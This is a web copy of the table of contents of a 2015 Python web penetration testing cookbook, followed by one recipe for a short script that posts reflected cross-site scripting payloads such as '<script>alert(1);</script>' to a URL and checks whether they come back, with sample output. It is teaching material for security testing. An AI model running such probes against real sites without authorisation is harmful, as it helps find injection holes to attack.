Table of Contents for
Python Web Penetration Testing Cookbook
Python Web Penetration Testing Cookbook
Published by
Packt Publishing, 2015
- Cover
- Table of Contents
- Python Web Penetration Testing Cookbook
- Python Web Penetration Testing Cookbook
- Credits
- About the Authors
- About the Reviewers
- www.PacktPub.com
- Disclamer
- Preface
- What you need for this book
- Who this book is for
- Sections
- Conventions
- Reader feedback
- Customer support
- 1. Gathering Open Source Intelligence
- Gathering information using the Shodan API
- Scripting a Google+ API search
- Downloading profile pictures using the Google+ API
- Harvesting additional results from the Google+ API using pagination
- Getting screenshots of websites with QtWebKit
- Screenshots based on a port list
- Spidering websites
- 2. Enumeration
- Performing a ping sweep with Scapy
- Scanning with Scapy
- Checking username validity
- Brute forcing usernames
- Enumerating files
- Brute forcing passwords
- Generating e-mail addresses from names
- Finding e-mail addresses from web pages
- Finding comments in source code
- 3. Vulnerability Identification
- Automated URL-based Directory Traversal
- Automated URL-based Cross-site scripting
- Automated parameter-based Cross-site scripting
- Automated fuzzing
- jQuery checking
- Header-based Cross-site scripting
- Shellshock checking
- 4. SQL Injection
- Checking jitter
- Identifying URL-based SQLi
- Exploiting Boolean SQLi
- Exploiting Blind SQL Injection
- Encoding payloads
- 5. Web Header Manipulation
- Testing HTTP methods
- Fingerprinting servers through HTTP headers
- Testing for insecure headers
- Brute forcing login through the Authorization header
- Testing for clickjacking vulnerabilities
- Identifying alternative sites by spoofing user agents
- Testing for insecure cookie flags
- Session fixation through a cookie injection
- 6. Image Analysis and Manipulation
- Hiding a message using LSB steganography
- Extracting messages hidden in LSB
- Hiding text in images
- Extracting text from images
- Enabling command and control using steganography
- 7. Encryption and Encoding
- Generating an MD5 hash
- Generating an SHA 1/128/256 hash
- Implementing SHA and MD5 hashes together
- Implementing SHA in a real-world scenario
- Generating a Bcrypt hash
- Cracking an MD5 hash
- Encoding with Base64
- Encoding with ROT13
- Cracking a substitution cipher
- Cracking the Atbash cipher
- Attacking one-time pad reuse
- Predicting a linear congruential generator
- Identifying hashes
- 8. Payloads and Shells
- Extracting data through HTTP requests
- Creating an HTTP C2
- Creating an FTP C2
- Creating an Twitter C2
- Creating a simple Netcat shell
- 9. Reporting
- Converting Nmap XML to CSV
- Extracting links from a URL to Maltego
- Extracting e-mails to Maltego
- Parsing Sslscan into CSV
- Generating graphs using plot.ly
- Index
Reflected Cross-site scripting commonly occurs through URL based parameters. You should know what Cross-site scripting is, and if you don't, I'm embarrassed for you. For real? I have to explain this? Okay. Cross-site scripting is injecting JavaScript into a page. It is hacking 101 and the first attack most people encounter or hear about. Inefficient methods of blocking Cross-site scripting focus around targeting script tags, and with script tags not being necessary to use JavaScript in a page, there are numerous ways around this.
We will create a script that takes a variety of standard evasion techniques and applies them to an automated submittal by using the Requests library. We will know whether the script has succeeded because either the script or an earlier version of it will be present on the page following the submittal.
The script we will be using is as follows:
import requests
import sys
url = sys.argv[1]
payloads = ['<script>alert(1);</script>', '<BODY ONLOAD=alert(1)>']
for payload in payloads:
req = requests.post(url+payload)
if payload in req.text:
print "Parameter vulnerable\r\n"
print "Attack string: "+payload
print req.text
breakThe following is an example of the output produced when using this script:
Parameter vulnerable Attack string: <script>alert(1);</script> Give me XSS: <script>alert(1);</script>
This script is similar to the earlier Directory Traversal script. We create a list of payloads rather than a dictionary this time as the check string and payload are the same:
payloads = ['<script>alert(1);</script>', '<BODY ONLOAD=alert(1)>']
We then use a similar loop as before to go through those values and submit them one by one:
for payload in payloads: req = requests.post(url+payload)
Each payload is appended to the end of our URL to be sent in an unended parameter such as 127.0.0.1/xss/xss.php?comment=. The payload will be added onto the end of that string in order to make a valid statement. We then check to see if that string is present in the following page:
if payload in req.text:
print "Parameter vulnerable\r\n"
print "Attack string: "+payload
print req.text
breakCross-site scripting is so simple and very easy to automate and detect as the attack string is usually the same as the outcome. The difficulties with Directory Traversal or SQLi, as we will encounter later, is that the outcome is not always predictable. In the event of a successful Cross-site scripting attack, it is.
This attack can be extended by providing more attack strings. Many examples can be found in the Mozilla FuzzDB, which we will be using later in the Automated fuzzing section script. Also, various forms of encoding can be applied using the original urllib library, which is shown throughout this book in various different examples.